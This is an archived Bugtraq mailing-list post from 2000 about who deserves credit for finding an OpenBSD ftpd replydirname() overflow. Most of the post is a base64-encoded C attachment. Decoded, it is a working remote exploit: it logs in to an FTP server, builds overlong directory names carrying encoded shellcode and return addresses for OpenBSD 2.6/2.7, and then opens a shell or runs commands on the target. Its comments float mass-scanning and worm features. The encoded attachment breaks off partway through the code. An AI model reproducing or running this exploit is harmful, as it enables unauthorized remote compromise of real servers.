[18167] in bugtraq
OBSD ftpd exploit clarification
daemon@ATHENA.MIT.EDU (jimjones)
Tue Dec 19 15:53:08 2000
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="0-1228696965-977200565=:23839"
Message-ID: <Pine.BSF.4.21.0012190725460.23839-200000@logos.relcom.ru>
Date: Tue, 19 Dec 2000 07:36:05 +0300
Reply-To: jimjones <jimjones@LOW-LEVEL.NET>
From: jimjones <jimjones@LOW-LEVEL.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--0-1228696965-977200565=:23839
Content-Type: TEXT/PLAIN; charset=US-ASCII
It is always sad when something like this has to be posted, but I am only
doing this to give proper credit where it is due.
As we all know, the OBSD ftpd replydirname() came to light with the post
by Kristian Vlaardingerbroek <kris@obit.nl>
Did he discover it? No. Did he give credit for the code or the
discovery? No.
The fact of the matter is that this post came from a personal, real-life
friend of scrippie's who gained his trust and exploited this trust in
order to shamelessly steal and post this vulnerability in a pitiful
attempt to gain fame.
In fact, the originator of this post did not even know how to fully patch
the bug without allowing a remote DOS condition to still exist.
The brunt of the work in the development of this exploit was done by
scrippie and dvorak and they certainly deserve all due credit for their
*-ORIGINAL-* exploitation of this vulnerability.
The condition was discovered 11/06/2000 and the exploit was created a week
afterwards.
Thanks, and let's hope that somebody learns from this post to consider
friendship and trust before plagiarism and duplicity for public
recognition.
--0-1228696965-977200565=:23839
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="obsd-ftpd.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.BSF.4.21.0012190736050.23839@logos.relcom.ru>
Content-Description:
Content-Disposition: attachment; filename="obsd-ftpd.c"
LyoNCiAgIGgwaDBoMCAwLWRheSBrMGQzeg0KICAgRXhwbG9pdCBieSBTY3Jp
cHBpZSwgaGVscCBieSBkdm9yYWsgYW5kIGppbWpvbmVzDQoNCiAgIGdyZWV0
cyB0byBzazgNCg0KICAgTm90IGZ1bGx5IGRldmVsb3B0IGV4cGxvaXQgYnV0
IGl0IHdvcmtzIG1vc3Qgb2YgdGhlIHRpbWUgOykNCg0KICAgVGhpbmdzIHRv
IGFkZDoNCiAgICAgIC0gYXV0b21hdGljIHdyaXRlYWJsZSBkaXJlY3Rvcnkg
ZmluZGluZw0KICAgICAgLSBzeW4tc2NhbiBvcHRpb24gdG8gZG8gbWFzcy1z
Y2FubmluZw0KICAgICAgLSB3b3JtIGNhcGFiaWxpdGllcz8gKHNob3VsZCBi
ZSBkb25lIHNlcGVyYXRseSB1c2luZyB0aGUgLUMgb3B0aW9uDQoJDQogICAx
MS8xMy8yMDAwDQoqLw0KDQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRl
IDxuZXRkYi5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRl
IDxzeXMvc29ja2V0Lmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5j
bHVkZSA8dW5pc3RkLmg+DQoNCg0Kdm9pZCB1c2FnZShjaGFyICpwcm9ncmFt
KTsNCmNoYXIgKnN0cmNyZWF0KGNoYXIgKiwgY2hhciAqLCBpbnQpOw0KY2hh
ciAqbG9uZ1RvQ2hhcih1bnNpZ25lZCBsb25nKTsNCmNoYXIgKnhyZWFsbG9j
KHZvaWQgKiwgc2l6ZV90KTsNCnZvaWQgeGZyZWUoY2hhciAqKnB0cik7DQpj
aGFyICp4bWFsbG9jKHNpemVfdCk7DQppbnQgeGNvbm5lY3QoY2hhciAqaG9z
dCwgdV9zaG9ydCBwb3J0KTsNCnZvaWQgeHNlbmQoaW50IGZkLCBjaGFyICpi
dWYpOw0Kdm9pZCB4c2VuZGZ0cGNtZChpbnQgZmQsIGNoYXIgKmNvbW1hbmQs
IGNoYXIgKnBhcmFtKTsNCnZvaWQgeHJlY2lldmVhbGwoaW50IGZkLCBjaGFy
ICpidWYsIGludCBzaXplKTsNCnZvaWQgeHJlY2lldmUoaW50IGZkLCBjaGFy
ICpidWYsIGludCBzaXplKTsNCnZvaWQgZnRwX2xvZ2luKGludCBmZCwgY2hh
ciAqdXNlciwgY2hhciAqcGFzc3dvcmQpOw0Kdm9pZCBleHBsb2l0KGludCBm
ZCk7DQoNCmludCB2ZXJib3NlID0gMDsNCg0KDQovKg0KICAgV3JpdHRlbiBi
eSBkdm9yYWssIGdhcmJsZWQgdXAgYnkgIlNtZWdtYSIgd2l0aCBhIHdvcmQg
eG9yIDB4YWFiYiBtYXNrDQogICB0byBnZXQgcmlkIG9mIGRvdHMgYW5kIHNs
YXNoZXMuDQoqLw0KDQpjaGFyIGhlYXZlbmx5Y29kZVtdID0NCiJceDMxXHhj
MFx4ODlceGMxXHg4MFx4YzFceDAyXHg1MVx4NTBceDA0XHg1YVx4NTBceGNk
XHg4MCINCiJceGViXHgxMFx4NWVceDMxXHhjOVx4YjFceDRhXHg2Nlx4ODFc
eDM2XHhiYlx4YWFceDQ2XHg0Nlx4ZTJceGY3XHhlYlx4MDVceGU4XHhlYlx4
ZmZceGZmXHhmZlx4ZmZceGZmXHhmZlx4NTBceGNmXHhlNVx4OWJceDdiXHhm
YVx4YmZceGJkXHhlYlx4NjdceDNiXHhmY1x4OGFceDZhXHgzM1x4ZWNceGJh
XHhhZVx4MzNceGZhXHg3Nlx4MmFceDhhXHg2YVx4ZWJceDIyXHhmZFx4YjVc
eDM2XHhmNFx4YTVceGY5XHhiZlx4YWZceGViXHg2N1x4M2JceDIzXHg3YVx4
ZmNceDhhXHg2YVx4YmZceDk3XHhlYlx4NjdceDNiXHhmYlx4OGFceDZhXHhi
Zlx4YTRceGYzXHhmYVx4NzZceDJhXHgzNlx4ZjRceGI5XHhmOVx4OGFceDZh
XHhiZlx4YTZceGViXHg2N1x4M2JceDI3XHhlNVx4YjRceGU4XHg5Ylx4N2Jc
eGFlXHg4Nlx4ZmFceDc2XHgyYVx4OGFceDZhXHhlYlx4MjJceGZkXHg4ZFx4
MzZceGY0XHg5M1x4ZjlceDM2XHhmNFx4OWJceDIzXHhlNVx4ODJceDMyXHhl
Y1x4OTdceGY5XHhiZlx4OTFceGViXHg2N1x4M2JceDQyXHgyZFx4NTVceDQ0
XHg1NVx4ZmFceGViXHg5NVx4ODRceDk0XHg4NFx4OTVceDg1XHg5NVx4ODRc
eDk0XHg4NFx4OTVceDg1XHg5NVx4ODRceDk0XHg4NFx4OTVceDg1XHg5NVx4
ODRceDk0XHg4NFx4OTVceDg1XHg5NVx4ODRceDk0XHg4NFx4OTVceGViXHg5
NFx4YzhceGQyXHhjNFx4OTRceGQ5XHhkMyI7DQoNCmNoYXIgdXNlclsyNTVd
ID0gImFub255bW91cyI7DQpjaGFyIHBhc3NbMjU1XSA9ICJhbm9ueW1vdXNA
YWJjLmNvbSI7DQpjaGFyIHdyaXRlX2RpcltQQVRIX01BWF0gPSAiLyI7DQpp
bnQgZnRwcG9ydCA9IDIxOw0KdW5zaWduZWQgbG9uZyBpbnQgcmV0X2FkZHIg
PSAwOw0KI2RlZmluZSBDTURfTE9DQUwgMA0KI2RlZmluZSBDTURfUkVNT1RF
IDENCmludCBjb21tYW5kX3R5cGUgPSAtMTsNCmNoYXIgKmNvbW1hbmQgPSBO
VUxMOw0KDQpzdHJ1Y3QgdHlwZVQgew0KCWNoYXIgKm5hbWU7DQoJdW5zaWdu
ZWQgbG9uZyBpbnQgcmV0X2FkZHI7DQp9Ow0KDQojZGVmaW5lIE5VTV9UWVBF
UyAyDQpzdHJ1Y3QgdHlwZVQgdHlwZXNbTlVNX1RZUEVTXSA9IHsNCgkiT3Bl
bkJTRCAyLjYiLCAweGRmYmZkMGFjLA0KCSJPcGVuQlNEIDIuNyIsIDB4ZGZi
ZmQwYWN9Ow0KDQp2b2lkDQp1c2FnZShjaGFyICpwcm9ncmFtKQ0Kew0KCWlu
dCBpOw0KCWZwcmludGYoc3RkZXJyLA0KCQkiXG5Vc2FnZTogJXMgWy1oIGhv
c3RdIFstZiBwb3J0XSBbLXUgdXNlcl0gWy1wIHBhc3NdIFstZCBkaXJlY3Rv
cnldIFstdCB0eXBlXVxuXHRcdFstciByZXRhZGRyXSBbLWMgY29tbWFuZF0g
Wy1DIGNvbW1hbmRdXG5cbiINCgkJIkRpcmVjdG9yeSBzaG91bGQgYmUgYW4g
YWJzb2x1dGUgcGF0aCwgd3JpdGFibGUgYnkgdGhlIHVzZXIuXG4iDQoJCSJU
aGUgYXJndW1lbnQgb2YgLWMgd2lsbCBiZSBleGVjdXRlZCBvbiB0aGUgcmVt
b3RlIGhvc3RcbiINCgkJIndoaWxlIHRoZSBhcmd1bWVudCBvZiAtQyB3aWxs
IGJlIGV4ZWN1dGVkIG9uIHRoZSBsb2NhbFxuIg0KCQkid2l0aCBpdHMgZmls
ZWRlc2NyaXB0b3JzIGNvbm5lY3RlZCB0byB0aGUgcmVtb3RlIGhvc3RcbiIN
CgkJIlZhbGlkIHR5cGVzOlxuIiwNCgkJcHJvZ3JhbSk7DQoJZm9yIChpID0g
MDsgaSA8IE5VTV9UWVBFUzsgaSsrKSB7DQoJCXByaW50ZigiJWQgOiAlc1xu
IiwgaSwgIHR5cGVzW2ldLm5hbWUpOw0KCX0JDQoJZXhpdCgtMSk7DQp9DQoN
Cg0KbWFpbihpbnQgYXJnYywgY2hhciAqKmFyZ3YpDQp7DQoJdW5zaWduZWQg
aW50IGk7DQoJaW50IG9wdCwgZmQ7DQoJdW5zaWduZWQgaW50IHR5cGUgPSAw
Ow0KCWNoYXIgKmhvc3RuYW1lID0gImxvY2FsaG9zdCI7DQoNCglpZiAoYXJn
YyA8IDIpDQoJCXVzYWdlKGFyZ3ZbMF0pOw0KDQoJd2hpbGUgKChvcHQgPSBn
ZXRvcHQoYXJnYywgYXJndiwgImg6cjp1OmY6ZDp0OnZwOmM6QzoiKSkgIT0g
LTEpIHsNCgkJc3dpdGNoIChvcHQpIHsNCgkJY2FzZSAnaCc6DQoJCQlob3N0
bmFtZSA9IG9wdGFyZzsNCgkJCWJyZWFrOw0KCQljYXNlICdDJzoNCgkJCWNv
bW1hbmQgPSBvcHRhcmc7DQoJCQljb21tYW5kX3R5cGUgPSBDTURfTE9DQUw7
DQoJCQlicmVhazsNCgkJY2FzZSAnYyc6DQoJCQljb21tYW5kID0gb3B0YXJn
Ow0KCQkJY29tbWFuZF90eXBlID0gQ01EX1JFTU9URTsNCgkJCWJyZWFrOw0K
CQljYXNlICdyJzoNCgkJCXJldF9hZGRyID0gc3RydG91bChvcHRhcmcsIE5V
TEwsIDApOw0KCQkJYnJlYWs7DQoJCWNhc2UgJ3YnOg0KCQkJdmVyYm9zZSsr
Ow0KCQkJYnJlYWs7DQoJCWNhc2UgJ2YnOg0KCQkJaWYgKCEoZnRwcG9ydCA9
IGF0b2kob3B0YXJnKSkpIHsNCgkJCQlmcHJpbnRmKHN0ZGVyciwgIkludmFs
aWQgZGVzdGluYXRpb24gcG9ydCAtICVzXG4iLCBvcHRhcmcpOw0KCQkJCWV4
aXQoLTEpOw0KCQkJfQ0KCQkJZXhpdCgtMSk7DQoJCQlicmVhazsNCgkJY2Fz
ZSAndSc6DQoJCQlzdHJuY3B5KHVzZXIsIG9wdGFyZywgc2l6ZW9mKHVzZXIp
IC0gMSk7DQoJCQl1c2VyW3NpemVvZih1c2VyKSAtIDFdID0gMHgwMDsNCgkJ
CWJyZWFrOw0KCQljYXNlICdwJzoNCgkJCXN0cm5jcHkocGFzcywgb3B0YXJn
LCBzaXplb2YocGFzcykgLSAxKTsNCgkJCXBhc3Nbc2l6ZW9mKHBhc3MpIC0g
MV0gPSAweDAwOw0KCQkJYnJlYWs7DQoJCWNhc2UgJ2QnOg0KCQkJc3RybmNw
eSh3cml0ZV9kaXIsIG9wdGFyZywgc2l6ZW9mKHdyaXRlX2RpcikgLSAxKTsN
CgkJCXdyaXRlX2RpcltzaXplb2Yod3JpdGVfZGlyKSAtIDFdID0gMHgwMDsN
CgkJCWlmICgod3JpdGVfZGlyWzBdICE9ICcvJykpIA0KCQkJCXVzYWdlKGFy
Z3ZbMF0pOw0KCQkJaWYgKCh3cml0ZV9kaXJbc3RybGVuKHdyaXRlX2Rpcikg
LSAxXSAhPSAnLycpKQ0KCQkJCXN0cm5jYXQod3JpdGVfZGlyLCAiLyIsIHNp
emVvZih3cml0ZV9kaXIpIC0gMSk7DQoJCQlicmVhazsNCgkJY2FzZSAndCc6
DQoJCQl0eXBlID0gYXRvaShvcHRhcmcpOw0KCQkJaWYgKHR5cGUgPiBOVU1f
VFlQRVMpDQoJCQkJdXNhZ2UoYXJndlswXSk7DQoJCQlicmVhazsNCgkJZGVm
YXVsdDoNCgkJCXVzYWdlKGFyZ3ZbMF0pOw0KCQl9DQoJfQ0KDQoJaWYgKHJl
dF9hZGRyID09IDApDQoJCXJldF9hZGRyID0gdHlwZXNbdHlwZV0ucmV0X2Fk
ZHI7DQoJaWYgKChmZCA9IHhjb25uZWN0KGhvc3RuYW1lLCBmdHBwb3J0KSkg
PT0gLTEpDQoJCWV4aXQoLTEpOw0KCWVsc2UNCgkJcHJpbnRmKCJDb25uZWN0
ZWQgdG8gcmVtb3RlIGhvc3QhIFNlbmRpbmcgZXZpbCBjb2Rlcy5cbiIpOw0K
DQoNCglmdHBfbG9naW4oZmQsIHVzZXIsIHBhc3MpOw0KCWV4cGxvaXQoZmQp
Ow0KDQoNCn0NCg0KaW50DQpmdHBfY21kX2VycihpbnQgZmQsIGNoYXIgKmNv
bW1hbmQsIGNoYXIgKnBhcmFtLCBjaGFyICpyZXMsIGludCBzaXplLCBjaGFy
ICogbXNnKQ0Kew0KCXhzZW5kZnRwY21kKGZkLCBjb21tYW5kLCBwYXJhbSk7
DQoJeHJlY2lldmVhbGwoZmQsIHJlcywgc2l6ZSk7DQoNCglpZiAocmVzID09
IE5VTEwpDQoJCXJldHVybiAwOw0KCWlmICh2ZXJib3NlKQ0KCQlwcmludGYo
IiVzXG4iLCByZXMpOw0KCWlmIChtc2cgJiYgKHJlc1swXSAhPSAnMicpKSB7
DQoJCWZwcmludGYoc3RkZXJyLCAiJXNcbiIsIG1zZyk7DQoJCWV4aXQoLTEp
Ow0KCX0NCglyZXR1cm4gKHJlc1swXSAhPSAnMicpOw0KfQ0KDQp2b2lkIHNo
ZWxsKGludCBmZCkNCnsNCglmZF9zZXQgcmVhZGZkczsNCgljaGFyIGJ1Zlsx
XTsNCgljaGFyICp0c3QgPSAiZWNobyA7IGVjaG8gOyBlY2hvIEhBVkUgRlVO
IDsgaWQgOyB1bmFtZSAtYVxuIjsNCg0KCXdyaXRlKGZkLCB0c3QsIHN0cmxl
bih0c3QpKTsNCgl3aGlsZSAoMSkgew0KCQlGRF9aRVJPKCZyZWFkZmRzKTsN
CgkJRkRfU0VUKDAsICZyZWFkZmRzKTsNCgkJRkRfU0VUKGZkLCAmcmVhZGZk
cyk7DQoJCXNlbGVjdChmZCArIDEsICZyZWFkZmRzLCBOVUxMLCBOVUxMLCBO
VUxMKTsNCgkJaWYgKEZEX0lTU0VUKDAsICZyZWFkZmRzKSkgew0KCQkJaWYg
KHJlYWQoMCwgYnVmLCAxKSAhPSAxKSB7DQoJCQkJcGVycm9yKCJyZWFkIik7
DQoJCQkJZXhpdCgxKTsNCgkJCX0NCgkJCXdyaXRlKGZkLCBidWYsIDEpOw0K
CQl9DQoJCWlmIChGRF9JU1NFVChmZCwgJnJlYWRmZHMpKSB7DQoJCQlpZiAo
cmVhZChmZCwgYnVmLCAxKSAhPSAxKSB7DQoJCQkJcGVycm9yKCJyZWFkIik7
DQoJCQkJZXhpdCgxKTsNCgkJCX0NCgkJCXdyaXRlKDEsIGJ1ZiwgMSk7DQoJ
CX0NCgl9DQp9DQoNCnZvaWQgZG9fY29tbWFuZChpbnQgZmQpDQp7DQoJY2hh
ciBidWZmZXJbMTAyNF07DQoJaW50IGxlbjsNCg0KCWlmIChjb21tYW5kX3R5
cGUgPT0gQ01EX0xPQ0FMKSB7DQoJCWR1cDIoZmQsIDApOw0KCQlkdXAyKGZk
LCAxKTsNCgkJZHVwMihmZCwgMik7DQoJCWV4ZWNsKGNvbW1hbmQsIGNvbW1h
bmQsIE5VTEwpOwkNCgkJZXhpdCAoMik7DQoJfQ0KCXdyaXRlKGZkLCBjb21t
YW5kLCBzdHJsZW4oY29tbWFuZCkpOw0KCXdyaXRlKGZkLCAiXG4iLCAxKTsN
Cgl3aGlsZSAoKGxlbiA9IHJlYWQoZmQsIGJ1ZmZlciwgc2l6ZW9mKGJ1ZmZl
cikpKSA+IDApIHsNCgkJd3JpdGUoMSwgYnVmZmVyLCBsZW4pOw0KCX0NCgll
eGl0ICgwKTsNCn0NCg0Kdm9pZCBleGVjdXRlX2NvbW1hbmQoZmQpIA0Kew0K
fQ0KDQppbnQgZXhwbG9pdF9vayhpbnQgZmQpDQp7DQoJY2hhciByZXN1bHRb
MTAyNF07DQoJeHNlbmQoZmQsICJpZFxuIik7DQoJDQoJeHJlY2lldmUoZmQs
IHJlc3VsdCwgc2l6ZW9mKHJlc3VsdCkpOw0KCXJldHVybiAoc3Ryc3RyKHJl
c3VsdCwgInVpZD0iKSAhPSBOVUxMKTsNCn0NCg0Kdm9pZCBleHBsb2l0KGlu
dCBmZCkNCnsNCgljaGFyIHJlc1sxMDI0XTsNCglpbnQgaGVhdmVubHljb2Rl
X3M7DQoJY2hhciAqZGlyID0gTlVMTDsNCg0KCWZ0cF9jbWRfZXJyKGZkLCAi
Q1dEIiwgd3JpdGVfZGlyLCByZXMsIDEwMjQsICJDYW4ndCBDV0QgdG8gd3Jp
dGVfZGlyIik7DQoNCglkaXIgPSBzdHJjcmVhdChkaXIsICJBIiwgMjU1IC0g
c3RybGVuKHdyaXRlX2RpcikpOw0KCWZ0cF9jbWRfZXJyKGZkLCAiTUtEIiwg
ZGlyLCByZXMsIDEwMjQsIE5VTEwpOw0KCWZ0cF9jbWRfZXJyKGZkLCAiQ1dE
IiwgZGlyLCByZXMsIDEwMjQsICJDYW4ndCBjaGFuZ2UgdG8gZGlyZWN0b3J5
Iik7DQoJeGZyZWUoJmRpcik7DQoJDQoJLyogbmV4dCBvbiA9IDI1NiAqLw0K
DQoJZGlyID0gc3RyY3JlYXQoZGlyLCAiQSIsIDI1NSk7DQoJZnRwX2NtZF9l
cnIoZmQsICJNS0QiLCBkaXIsIHJlcywgMTAyNCwgTlVMTCk7DQoJZnRwX2Nt
ZF9lcnIoZmQsICJDV0QiLCBkaXIsIHJlcywgMTAyNCwgIkNhbid0IGNoYW5n
ZSB0byBkaXJlY3RvcnkiKTsNCgl4ZnJlZSgmZGlyKTsNCgkvKiBuZXh0IG9u
ID0gNTEyICovDQoNCgloZWF2ZW5seWNvZGVfcyA9IHN0cmxlbihoZWF2ZW5s
eWNvZGUpOw0KCWRpciA9IHN0cmNyZWF0KGRpciwgIkEiLCAyNTQgLSBoZWF2
ZW5seWNvZGVfcyk7DQoJZGlyID0gc3RyY3JlYXQoZGlyLCBoZWF2ZW5seWNv
ZGUsIDEpOw0KCWZ0cF9jbWRfZXJyKGZkLCAiTUtEIiwgZGlyLCByZXMsIDEw
MjQsIE5VTEwpOw0KCWZ0cF9jbWRfZXJyKGZkLCAiQ1dEIiwgZGlyLCByZXMs
IDEwMjQsICJDYW4ndCBjaGFuZ2UgdG8gZGlyZWN0b3J5Iik7DQoJeGZyZWUo
JmRpcik7DQoJLyogbmV4dCBvbiA9IDc2OCAqLw0KDQoJZGlyID0gc3RyY3Jl
YXQoZGlyLCBsb25nVG9DaGFyKHJldF9hZGRyKSwgMjUyIC8gNCk7DQoJZnRw
X2NtZF9lcnIoZmQsICJNS0QiLCBkaXIsIHJlcywgMTAyNCwgTlVMTCk7DQoJ
ZnRwX2NtZF9lcnIoZmQsICJDV0QiLCBkaXIsIHJlcywgMTAyNCwgIkNhbid0
IGNoYW5nZSB0byBkaXJlY3RvcnkiKTsNCgl4ZnJlZSgmZGlyKTsNCgkvKiBs
ZW5ndGggPSAxMDIwICovDQoNCgkvKiAxMDIyIG1vZXQgIiB6aWpuICovDQoJ
ZGlyID0gc3RyY3JlYXQoZGlyLCAiQUFBXCIiLCAxKTsNCglmdHBfY21kX2Vy
cihmZCwgIk1LRCIsIGRpciwgcmVzLCAxMDI0LCBOVUxMKTsNCglmdHBfY21k
X2VycihmZCwgIkNXRCIsIGRpciwgcmVzLCAxMDI0LCAiQ2FuJ3QgY2hhbmdl
IHRvIGRpcmVjdG9yeSIpOw0KCXhmcmVlKCZkaXIpOw0KDQoJLyogYW5kIHRl
bGwgaXQgdG8gYmxvdyB1cCAqLw0KCWZ0cF9jbWRfZXJyKGZkLCAiUFdEIiwg
TlVMTCwgcmVzLCAxMDI0LCBOVUxMKTsNCg0KCWlmICghZXhwbG9pdF9vayhm
ZCkpIHsNCgkJaWYgKGNvbW1hbmQgIT0gTlVMTCkgew0KCQkJZXhpdCAoMik7
DQoJCX0gDQoJCWZwcmludGYoc3RkZXJyLCAiRXhwbG9pdCBmYWlsZWRcbiIp
OwkNCgkJZXhpdCAoMSk7DQoJfQ0KCWlmIChjb21tYW5kID09IE5VTEwpDQoJ
CXNoZWxsKGZkKTsNCgllbHNlDQoJCWRvX2NvbW1hbmQoZmQpOw0KfQ0KDQoN
CmNoYXIgKg0Kc3RyY3JlYXQoY2hhciAqZGVzdCwgY2hhciAqcGF0dGVybiwg
aW50IHJlcGVhdCkNCnsNCgljaGFyICpyZXQ7DQoJc2l6ZV90IHBsZW4sIGRs
ZW4gPSAwOw0KCWludCBpOw0KDQoJaWYgKGRlc3QpDQoJCWRsZW4gPSBzdHJs
ZW4oZGVzdCk7DQoJcGxlbiA9IHN0cmxlbihwYXR0ZXJuKTsNCg0KCXJldCA9
IChjaGFyICopIHhyZWFsbG9jKGRlc3QsIGRsZW4gKyByZXBlYXQgKiBwbGVu
ICsgMSk7DQoNCglpZiAoIWRlc3QpDQoJCXJldFswXSA9IDB4MDA7DQoNCglm
b3IgKGkgPSAwOyBpIDwgcmVwZWF0OyBpKyspIHsNCgkJc3RyY2F0KHJldCwg
cGF0dGVybik7DQoJfQ0KCXJldHVybiAocmV0KTsNCn0NCg0KY2hhciAqDQps
b25nVG9DaGFyKHVuc2lnbmVkIGxvbmcgYmxhYXQpDQp7DQoJY2hhciAqcmV0
Ow0KDQoJcmV0ID0gKGNoYXIgKikgeG1hbGxvYyhzaXplb2YobG9uZykgKyAx
KTsNCgltZW1jcHkocmV0LCAmYmxhYXQsIHNpemVvZihsb25nKSk7DQoJcmV0
W3NpemVvZihsb25nKV0gPSAweDAwOw0KDQoJcmV0dXJuIChyZXQpOw0KfQ0K
DQpjaGFyICoNCnhyZWFsbG9jKHZvaWQgKnB0ciwgc2l6ZV90IHNpemUpDQp7
DQoJY2hhciAqd2l0dGdlbnN0ZWluX3dhc19hX2RydW5rZW5fc3dpbmU7DQoN
CglpZiAoISh3aXR0Z2Vuc3RlaW5fd2FzX2FfZHJ1bmtlbl9zd2luZSA9IChj
aGFyICopIHJlYWxsb2MocHRyLCBzaXplKSkpIHsNCgkJZnByaW50ZihzdGRl
cnIsICJDYW5ub3QgY2FsY3VsYXRlIHVuaXZlcnNlXG4iKTsNCgkJZXhpdCgt
MSk7DQoJfQ0KCXJldHVybiAod2l0dGdlbnN0ZWluX3dhc19hX2RydW5rZW5f
c3dpbmUpOw0KfQ0KDQp2b2lkDQp4ZnJlZShjaGFyICoqcHRyKQ0Kew0KCWlm
ICghcHRyIHx8ICEqcHRyKQ0KCQlyZXR1cm47DQoJZnJlZSgqcHRyKTsNCgkq
cHRyID0gTlVMTDsNCn0NCg0KY2hhciAqDQp4bWFsbG9jKHNpemVfdCBzaXpl
KQ0Kew0KCWNoYXIgKmhlaWRlZ2dlcl93YXNfYV9ib296eV9iZWdnYXI7DQoN
CglpZiAoIShoZWlkZWdnZXJfd2FzX2FfYm9venlfYmVnZ2FyID0gKGNoYXIg
KikgbWFsbG9jKHNpemUpKSkgew0KCQlmcHJpbnRmKHN0ZGVyciwgIk91dCBv
ZiBjaGVlc2UgZXJyb3JcbiIpOw0KCQlleGl0KC0xKTsNCgl9DQoJcmV0dXJu
IChoZWlkZWdnZXJfd2FzX2FfYm9venlfYmVnZ2FyKTsNCn0NCg0KDQppbnQN
Cnhjb25uZWN0KGNoYXIgKmhvc3QsIHVfc2hvcnQgcG9ydCkNCnsNCglzdHJ1
Y3QgaG9zdGVudCAqaGU7DQoJc3RydWN0IHNvY2thZGRyX2luIHNfaW47DQoJ
aW50IGZkOw0KDQoJaWYgKChoZSA9IGdldGhvc3RieW5hbWUoaG9zdCkpID09
IE5VTEwpIHsNCgkJcGVycm9yKCJnZXRob3N0YnluYW1lIik7DQoJCXJldHVy
biAoLTEpOw0KCX0NCgltZW1zZXQoJnNfaW4sIDAsIHNpemVvZihzX2luKSk7
DQoJc19pbi5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCglzX2luLnNpbl9wb3J0
ID0gaHRvbnMocG9ydCk7DQoJbWVtY3B5KCZzX2luLnNpbl9hZGRyLnNfYWRk
ciwgaGUtPmhfYWRkciwgaGUtPmhfbGVuZ3RoKTsNCg0KCWlmICgoZmQgPSBz
b2NrZXQoQUZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0g
LTEpIHsNCgkJcGVycm9yKCJzb2NrZXQiKTsNCgkJcmV0dXJuICgtMSk7DQoJ
fQ0KCWlmIChjb25uZWN0KGZkLCAoY29uc3Qgc3RydWN0IHNvY2thZGRyICop
ICYgc19pbiwgc2l6ZW9mKHNfaW4pKSA9PSAtMSkgew0KCQlwZXJyb3IoImNv
bm5lY3QiKTsNCgkJcmV0dXJuICgtMSk7DQoJfQ0KCXJldHVybiBmZDsNCn0N
Cg0KLyogcmV0dXJucyBzdGF0dXMgZnJvbSBmdHBkICovDQp2b2lkDQpmdHBf
bG9naW4oaW50IGZkLCBjaGFyICp1c2VyLCBjaGFyICpwYXNzd29yZCkNCnsN
CgljaGFyIHJlcGx5WzUxMl07DQoJaW50IHJlcDsNCgl4cmVjaWV2ZWFsbChm
ZCwgcmVwbHksIHNpemVvZihyZXBseSkpOw0KCWlmICh2ZXJib3NlKSB7DQoJ
CXByaW50ZigiTG9nZ2luZyBpbiAuLlxuIik7DQoJCXByaW50ZigiJXNcbiIs
IHJlcGx5KTsNCgl9DQoJeHNlbmRmdHBjbWQoZmQsICJVU0VSIiwgdXNlcik7
DQoJeHJlY2lldmVhbGwoZmQsIHJlcGx5LCBzaXplb2YocmVwbHkpKTsNCglp
ZiAodmVyYm9zZSkNCgkJcHJpbnRmKCIlc1xuIiwgcmVwbHkpOw0KCXhzZW5k
ZnRwY21kKGZkLCAiUEFTUyIsIHBhc3N3b3JkKTsNCgl4cmVjaWV2ZWFsbChm
ZCwgcmVwbHksIHNpemVvZihyZXBseSkpOw0KCWlmICh2ZXJib3NlKQ0KCQlw
cmludGYoIiVzXG4iLCByZXBseSk7DQoNCglpZiAocmVwbHlbMF0gIT0gJzIn
KSB7DQoJCXByaW50ZigiTG9naW4gZmFpbGVkLlxuIik7DQoJCWV4aXQoLTEp
Ow0KCX0NCn0NCg0Kdm9pZA0KeHNlbmRmdHBjbWQoaW50IGZkLCBjaGFyICpj
b21tYW5kLCBjaGFyICpwYXJhbSkNCnsNCgl4c2VuZChmZCwgY29tbWFuZCk7
DQoNCglpZiAocGFyYW0gIT0gTlVMTCkgew0KCQl4c2VuZChmZCwgIiAiKTsN
CgkJeHNlbmQoZmQsIHBhcmFtKTsNCgl9DQoJeHNlbmQoZmQsICJcclxuIik7
DQp9DQoNCg0Kdm9pZA0KeHNlbmQoaW50IGZkLCBjaGFyICpidWYpDQp7DQoN
CglpZiAoc2VuZChmZCwgYnVmLCBzdHJsZW4oYnVmKSwgMCkgIT0gc3RybGVu
KGJ1ZikpIHsNCgkJcGVycm9yKCJzZW5kIik7DQoJCWV4aXQoLTEpOw0KCX0N
Cn0NCg0Kdm9pZA0KeHJlY2lldmVhbGwoaW50IGZkLCBjaGFyICpidWYsIGlu
dCBzaXplKQ0Kew0KCWNoYXIgc2NyYXRjaFs2XTsNCg0KCWlmIChidWYgPT0g
TlVMTCB8fCBzaXplID09IDApIHsNCgkJYnVmID0gc2NyYXRjaDsNCgkJc2l6
ZSA9IHNpemVvZihzY3JhdGNoKTsNCgl9DQoJbWVtc2V0KGJ1ZiwgMCwgc2l6
ZSk7DQoJZG8gew0KCQl4cmVjaWV2ZShmZCwgYnVmLCBzaXplKTsNCgl9IHdo
aWxlIChidWZbM10gPT0gJy0nKTsNCn0NCi8qIHJlY2lldmVzIGEgbGluZSBm
cm9tIHRoZSBmdHBkICovDQp2b2lkDQp4cmVjaWV2ZShpbnQgZmQsIGNoYXIg
KmJ1ZiwgaW50IHNpemUpDQp7DQoJY2hhciAqZW5kOw0KCWNoYXIgY2g7DQoN
CgllbmQgPSBidWYgKyBzaXplOw0KDQoJd2hpbGUgKGJ1ZiA8IGVuZCkgew0K
CQlpZiAocmVhZChmZCwgYnVmLCAxKSAhPSAxKSB7DQoJCQlwZXJyb3IoInJl
YWQiKTsJLyogWFhYICovDQoJCQlleGl0KC0xKTsNCgkJfQ0KCQlpZiAoYnVm
WzBdID09ICdcbicpIHsNCgkJCWJ1ZlswXSA9ICdcMCc7DQoJCQlyZXR1cm47
DQoJCX0NCgkJaWYgKGJ1ZlswXSAhPSAnXHInKSB7DQoJCQlidWYrKzsNCgkJ
fQ0KCX0NCglidWYtLTsNCgl3aGlsZSAocmVhZChmZCwgYnVmLCAxKSA9PSAx
